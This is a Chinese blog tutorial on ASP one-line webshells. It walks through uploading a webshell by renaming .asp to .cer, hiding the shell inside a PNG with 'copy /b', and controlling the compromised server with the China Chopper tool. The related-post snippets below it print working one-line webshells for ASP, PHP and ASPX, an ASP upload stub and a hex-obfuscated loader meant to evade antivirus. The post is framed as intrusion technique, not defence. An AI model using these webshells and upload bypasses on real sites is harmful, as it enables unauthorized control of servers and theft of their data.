asp 一句话小马_木马分析一句话木马制作和“菜刀”的使用

最新推荐文章于 2024-04-16 10:38:37 发布
最新推荐文章于 2024-04-16 10:38:37 发布
阅读量1w 收藏 12
点赞数 3
文章标签: asp 一句话小马
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39528525/article/details/112127984
版权

5aaf78cf706ca723129fdcb27de9ad99.gif

1.什么是webshell

Web  即 web服务也就是网站 Shell  即人机交互界面,取得对服务器/电脑某种程度上的操作权限。 Webshell 即拿到网站服务器的权限(shell) 比如我在cmd下的命令操作就可以叫get shell ,获得电脑操作权限。

19ad8168571faede995b22d9847efbd5.png

2.怎么才能get shell

使用木马可以帮我们拿到shell,达到控制网站服务器的目的,也称为网站的后门。 常见的木马: asp一句话木马、php一句话木马、aspx一句话木马等等 百度百科给出的例子:

625a278aae1f30fd1ba665a4775741ca.png

我们以asp一句话木马为例: eval ---执行的意思 request  ---从用户那里取得的信息 木马---执行从用户那里取得的信息 木马也分小马和大马。 大马:功能繁杂  各种各样  文件大 小马:文件小 功能就是上传

种植木马,最终可以达到目的

d371da2b584eaaa3141487686a65ed67.png

3.怎么使用木马呢?

寻找网站上传点:能上传图片、文件的地方。 如我在某一网站上传asp文件,告警文件类型不允许。

264d93fbc995173ffde62577c595efbb.png

告警发现存在asp cer后缀漏洞,该漏洞为cer文件可以当成asp文件执行,即默认配置漏洞。 将asp文件后缀改cer即可成功上传。

4.copy命令制作图片木马

可以用copy命令制作图片马,隐藏很多信息   准备一张尽可能小的png图片,和一句话木马asp

736e61a323d43e3ef8fcef56056a3195.png

png图片用记事本打开

d734f1a27023ff6591eb6b4da84e6bd1.png

cmd下运行命令

copy 耶.png/b+11.asp test.png

32e4cd898a4439639b356ec81ba32aa4.png

copy完成,对比下两张图片,用记事本打开,test.png是隐藏木马的。

6089f00bc685cf85794b8570319d080c.png

完成后,将test.png 后缀改为.cer上传即可。

4."菜刀"工具使用

一句话木马需要菜刀工具协助。 菜刀是管理shell的一款工具 同类型工具(开源)还有: 冰蝎 中国蚁剑 菜刀如何使用: 在网站上传木马文件后,使用菜刀连接。 地址为木马上传的地址 密码即一句话木马括号里的内容,如,密码即为MH。

34e001aa3bf3790363333480d8a31faf.png

连接成功,即进入对方服务器。

79ccd428f73f2e60917c29614501b835.png

好看记得关注我 我们的故事未完~~

 
weixin_39528525
关注
  • 3
    点赞
  • 12
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
asp一句话html,asp常用的一句话木马大全
weixin_31558841的博客
06-28 2457
【入侵技术】 ASP一句话木马大全""ThenExecute(Request("MH"))%>""thensession("MH")=request("MH"):endif:ifsession("MH")<>""thenexecutesession("MH")%>executerequest("MH")1asp一句话木马一句话木马 服务器端带验证:cmd.aspif...
全面详尽剖析一句话asp木马
枫 客
06-03 1386
 文章作者:冷月孤枫                                       备注:QQ:89224874  个人主页:http://fker.8866.org/转载请保留信息的完整性所谓一句话插马,就是通过向服务端提交一句简短的代码来达到向服务器插入木马并最终获得webshell的方法。它分为一句话asp马、一句话php马……,本文就一句话asp木马来做一次详尽的剖析。在此首
10-菜刀连接木马
最新发布
tianxiadiiw的博客
04-16 493
可以获取你想要的配置信息,也可以用system函数来输入命令。是属于辅助工具,并且菜刀的传输过程是明文传输的,目前已经被WAF进行防护了。接下来就可以连接菜刀使用菜刀来连接木马然后就可以查看到服务器里面的东西了。先看是否存在注入点,有下图所示则表示存在注入点==》可以进行接下来的操作。2、木马必须是POST请求,参数自定义,在菜刀里给出正确的参数名。写入一句话木马进行探测,如果嗅探成功后在进行大马的上传。找到了漏洞后,并且上传了木马之后才能使用的两款工具。有文件,则说明可以读任意路径的文件。
什么是ASP木马
qq_41821067的博客
11-26 1419
一个ASP小马
01-20
<%if request.QueryString(“action”)=”log” thena=Request.TotalBytes:if a Then b=”adodb.stream”:Set c=Createobject(b):c.Type=1:c.Open:c.Write Request.BinaryRead(a):c.Position=0:d=c.Read:e=chrB(13)&chrB(10):f=Instrb(d,e):g=Instrb(f+1,d,e):set h=Createobject(b):h.Type=1:h.Open:c.Position=f+1:c.Copyto h,g
ASPX史上最全一句话集合
2301_80115097的博客
10-18 843
/可执行命令一句话
一句话 asp木马加密版 彻底突破杀毒软件
01-02
不知道怎样表达清楚。看例子吧: 代码如下:[removed] Execute(HextoStr(“65786563757465287265717565737428636872283335292929”)) Function HextoStr(data) HextoStr=”EXECUTE “”””” C=”&CHR(&H” N...
asp一句话.zip
06-28
asp一句话.zip
将VBS或ASP中的代码转成一句话形式
09-05
本文主要探讨如何将VBS(Visual Basic Script)和ASP(Active Server Pages)中的代码转换为一句话形式。 在VBS和ASP中,换行符通常用于分隔不同的语句,但在创建一句话代码时,我们需要消除这些换行符,用其他方式...
隐藏ASP木马后门的两种方法
01-20
1、建立非标准目录:mkdir images..\ 拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp 通过web访问ASP木马:http://ip/images../news.asp?action=login 如何删除非...
asp小马
06-25
asp小马asp小马asp小马asp小马asp小马asp小马asp小马
淘特ASP木马扫描器 v1.1.rar
07-05
可以扫描服务器上的所有指定类型(asp,cer,asa,cdx)的文件,查出可疑的木马程序。系统采用扫描程序与病毒库分离的形式
一句话的艺术-web提权.pdf
01-25
一句话的艺术-web提权】是关于网络安全中的一种高级技巧,主要涉及如何在Web环境中,即使在存在各种安全防护措施的情况下,依然能够通过“一句话木马”执行任意代码。这篇文章主要探讨了如何在Web应用程序中绕过...
ASP下检测图片木马的函数代码
01-02
木马原理:入侵者使用诸如ASP图片木马生成器之类的工具将一张正常的图片与一个ASP木马文件合并成一个图片文件(即将对网站有害的 ASP代码插在图片编码之后,虽然图片仍然可以正常显示,但是文件内容和尺寸已被改变)...
ASP网站中数据库被挂木马的解决方案
01-02
本文我们详细介绍了ASP数据库被挂木马的详细解决方案之编程处理的方法,解决方案分为以下三步: 第一步: 为现有数据库做好备份。 第二步: 执行如下ASP文件,这样就可以去掉数据库当中的JS木马: 注:conn.asp自己...
Aspx一句话木马使用
Magicbreaker的专栏
01-15 8710
Aspx一句话木马使用1.相当于ASP一句话木马:程序代码alter database pubs set RECOVERY FULL--create table pubs.dbo.cmd(a image)backup log pubs to disk = c:/TM with initinsert into pubs.dbo.cmd(a) values ( )ba
一句话木马——菜刀软件
qq_37723186的博客
05-04 1213
php的一句话木马: <?php @eval($_POST['pass']);?> asp一句话木马是: <%eval request ("pass")%> aspx的一句话木马是: <%@ Page Language="Jscript"%> <%eval(Request.Item["pass"],"unsafe");%> 其中pass为设...
一句话木马
Drigon
04-21 313
过狗一句话汇总(包含asp+php+aspx+jsp)
01-26
过狗一句话汇总,是一个用于表示利用各种网站漏洞在网站上发布恶意代码的黑客行为。这个词通常与ASP、PHP、ASPX、JSP等网站开发语言相关联。黑客们会在网站上植入恶意代码,比如恶意脚本、木马病毒等,以获取用户的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值